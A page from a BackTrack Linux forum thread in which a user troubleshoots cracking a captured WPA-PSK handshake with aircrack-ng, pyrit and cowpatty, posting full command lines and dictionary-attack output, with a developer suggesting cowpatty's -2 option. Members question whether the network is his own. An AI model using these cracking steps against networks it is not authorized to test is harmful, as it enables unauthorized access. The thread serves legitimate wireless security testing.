Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: HOW_TO test WPA_handshake

  1. #1
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default HOW_TO test WPA_handshake

    Hi! I have one problem with captured WPA-PSK hanshake. I used cowpatty to recover password+pyrit. Everything goes well untill i try to putt my *.cap file to cowpatty, it reports:
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/Deauth_Ocelot_WPA/psk-01.cap

    "End of pcap capture file, incomplete four-way handshake exchange. Try using a
    different capture."
    So a question is, how can I test captured WPA-PSK for compete handshake exchange?
    And a full description of entered commands:
    Code:
    dem@dem-laptop:~$ aircrack-ng psk-01.cap
    Opening psk-01.cap
    Read 19428 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:1E:C1:B6:63:00  SeaOcelotWL               WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening psk-01.cap
    Please specify a dictionary (option -w).
    
    
    Quitting aircrack-ng...
    dem@dem-laptop:~$ pyrit -e SeaOcelotWL create_essid
    
    Created ESSID 'SeaOcelotWL'
    dem@dem-laptop:~$ pyrit -f /home/dem/brut/wpa.lst import_passwords
    
    Importing from '/home/dem/brut/wpa.lst'
    2830423 lines read. Flushing buffers...
    All done.
    dem@dem-laptop:~$ pyrit batch
    
    Working on ESSID 'SeaOcelotWL'
    Computed 2775377 PMKs so far; 3247 PMKs per second; 27062 passwords buffered.
    Stopped reading workunits...
    Computed 2819446 PMKs so far; 3256 PMKs per second; 0 passwords buffered.ed..
    All done. 3269.53 PMKs/s total.
    #1: 'CUDA-Device #1 'GeForce 9800M GTS'': 2817.9 PMKs/s (Occ. 99.9%; RTT 3.0)
    #2: 'CPU-Core (SSE2)': 455.3 PMKs/s (Occ. 99.9%; RTT 3.0)
    Batchprocessing done.
    dem@dem-laptop:~$ pyrit -e SeaOcelotWL -f cow.out export_cowpatty
    
    Exporting to 'cow.out'...
    2830414 entries written. All done.
    dem@dem-laptop:~$ cowpatty
    cowpatty: Must supply a pcap file with -r
    
    Usage: cowpatty [options]
    
    	-f 	Dictionary file
    	-d 	Hash file (genpmk)
    	-r 	Packet capture file
    	-s 	Network SSID (enclose in quotes if SSID includes spaces)
    	-2 	Use frames 1 and 2 or 2 and 3 for key attack (nonstrict mode)
    	-c 	Check for valid 4-way frames, does not crack
    	-h 	Print this help information and exit
    	-v 	Print verbose information (more -v for more verbosity)
    	-V 	Print program version and exit
    
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/psk-01.cap
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/Deauth_Ocelot_WPA/psk-01.cap
    
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.

  2. #2
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Ok, first off, please tell us plainly you are in fact testing a handshake collected from your own network. I do not want to help if you're looking for "alternate sources of internet".
    You. Are. Doing. It. Wrong.
    -Gitsnik

  3. #3
    My life is this forum Barry's Avatar
    Join Date
    Jan 2010
    Posts
    3,817

    Default

    Quote Originally Posted by kidFromBigD View Post
    Ok, first off, please tell us plainly you are in fact testing a handshake collected from your own network. I do not want to help if you're looking for "alternate sources of internet".
    Oh yea, he's going to tell the truth now.....
    Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69

  4. #4
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Which version of cowpatty are you using of which backtrack? The problem is the way cowpatty is coded and if you do not have a patched version it will fail.

  5. #5
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Quote Originally Posted by pureh@te View Post
    Which version of cowpatty are you using of which backtrack?
    i have installed it from Festor repo
    Actually cowpatty works for me, with other capture:
    Code:
    dem@dem-laptop:~$ cowpatty -d cow.out -s SeaOcelotWL -r /home/dem/OCEAN_WPA/psk-01.cap
    cowpatty 4.6 - WPA-PSK dictionary attack.
    
    Collected all necessary data to mount crack against WPA/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 10000: troostgr
    key no. 20000: servicetree
    key no. 30000: pristupnost
    key no. 40000: nawasihi
    key no. 50000: katzenmusik
    key no. 60000: gilabend
    key no. 70000: e'caillures
    key no. 80000: blanchflower's
    key no. 90000: WISENTENCE
    key no. 100000: Fdxcy4zc1RTRhNP
    key no. 110000: well-assessed
    key no. 120000: swpclient
    #.....and so on
    #and at last my perfomance:
     2830415 passphrases tested in 18.32 seconds:  154481.34 passphrases/second
    As you see I have cowpatty 4.6

  6. #6
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Quote Originally Posted by Barry View Post
    Oh yea, he's going to tell the truth now.....
    O.K. Truth? That is our ship's wifi network, set by me. "Sea Ocelot" ship's name operated by Thome offshore, as you see it in essid. Believe or not that is your decision...

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Well there is your problem. I have no idea who fester is therefore he wouldn't have the patch's that we have. A close friend of mine wrote the patch. I'll explain the problem.

    You do not have a full capture. There are 4 parts to a wpa hand shake capture. It will work in aircrack-ng because aircrack looks at packets 1 and 2 or 2 and 3. The problem with cowpatty is it looks only at packet 4. Now as of version 4.6 which you have, josh implemented our patch in to cowpatty. So give cowpatty a argument 0f -2 and it should work.

    By the way this is a forum for backtrack Linux not general questions. If you had backtrack you would have the properly patched cowpatty. The -2 option josh implemented only works most of the time so if that doesnt work for you then you need our version.

  8. #8
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    Thanks pureh@te, now almost all clear for me. i didn't mention my Backtrack distro, because seems like i have a problem with detecticting my CUDA card in it.
    Pyrit shows me only two CPUs when I entered list_cores command and no CUDA device. I have posted this issue to your HOWTO post-"pyrit-cuda-nvidia-tutorial-nvidia-overclock-instructions". That's why I have installed pyrit to my ordinary Ubuntu 9.04 amd64 and i think that is problem in driver version which CUDA card uses. Fester repos has 180.44 and Bactrack's is 185.18.08-bt5 version, but of course, I may wrong. Anyway I want try 190 beta driver in Backtrack4 pre, NVIDIA have just released it and posted CUDA support.

  9. #9
    Very good friend of the forum TAPE's Avatar
    Join Date
    Jan 2010
    Location
    Europe
    Posts
    599

    Default

    Demontager, just out of interest, is your query here related to the ISPS requirements of the company / ship ?
    Or this part of the classification society's external audit or internal audit ?

    Just interested as haven't come accross checks of this type onboard yet, infact havent got wireless on the ships at all as far as I know.. but might have to check if some crew hook up a router now

  10. #10
    Junior Member
    Join Date
    Jul 2009
    Posts
    27

    Default

    So,I checked pyrit in Backtrack4 pre and as I told it can't recognize CUDA device, it shows 2 CPUs only.
    Code:
    root@track-laptop:~# pyrit benchmark
    
    The ESSID-blobspace seems to be empty; you should create an ESSID...
    
    Running benchmark for at least 60 seconds...
    
    CPU-Core (x86): 227.07 PMKs/s, (99.92% occupancy)
    CPU-Core (x86): 224.65 PMKs/s, (84.16% occupancy)
    
    Benchmark done. 451.72 PMKs/s total.
    And another thing, I have tested cowpatty in BT4 without hashed tables, see what I got:
    Code:
    root@track-laptop:/pentest/wireless/cowpatty# ./cowpatty -f ~/ocelot/wpa.lst -s SeaOcelotWL -r ~/ocelot/psk-01.cap
    cowpatty 4.3 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    Collected all necessary data to mount crack against WPA2/PSK passphrase.
    Starting dictionary attack.  Please be patient.
    key no. 1000: 0duopoly
    key no. 2000: 0observe
    key no. 3000: 0trilogy
    key no. 4000: 1ABDELFATTAH
    ^CUnable to identify the PSK from the dictionary file. Try expanding your
    passphrase list, and double-check the SSID.  Sorry it didn't work out.
    
    4495 passphrases tested in 42.69 seconds:  105.29 passphrases/second
    That is the same cap file, so that's means Festor's 4.6 cowpaty hadn't patched.
    And one more, I have supplied cowpatty 4.6 ver on Ubuntu 9.04 with -2 option, but still same issue:
    Code:
    dem@dem-laptop:~$ cowpatty -2 -v -d cow.out -s SeaOcelotWL -r /home/dem/psk-01.cap
    cowpatty 4.6 - WPA-PSK dictionary attack. 
    
    End of pcap capture file, incomplete four-way handshake exchange.  Try using a
    different capture.
    For this moment I didn't check others NVIDIA drivers for Backtrack 4, but I'll, soon.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •